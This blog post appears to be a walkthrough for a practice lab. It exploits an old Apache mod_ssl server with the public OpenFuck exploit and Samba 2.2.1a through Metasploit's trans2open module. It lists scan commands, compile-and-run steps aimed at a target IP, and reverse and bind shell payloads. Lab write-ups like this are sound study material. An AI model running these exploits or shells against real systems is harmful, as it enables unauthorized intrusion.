nmap -sV <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <IP>
nmap -p- -sV -sS -T4
-A<IP>
Apache httpd 1.3.20
((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
This apache version has vulnerability of openfuck. old openfuck.c is not working, so get the latest openfuck from github: "https://github.com/heltonWernik/OpenLuck"
Use the steps and perform: like
- Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
- Install ssl-dev library
apt-get install libssl-dev
- Compile it
gcc -o OpenFuck OpenFuck.c -lcrypto
- Running the Exploit
./OpenFuck
- See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenFuck 0x6a [Target Ip] [port] -c 40
./OpenFuck 0x6a 192.168.80.145 443 -c 40
enum4linux : use this command to check rpc login with null username and null password and to get other details.
samba version: to find the version of samba, use scanner
use auxiliary/scanner/smb/smb_version
samba: samba2.2.1a
this version has trans2open vulnerability and the exploit is available on metasploit
exploit: use exploit/linux/samba/trans2open
set payload with the exploit : set payload linux/x86/meterpreter/reverse_tcp (it will not work)
thn use any payload from below mentioned:
set payload
generic/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp
No comments:
Post a Comment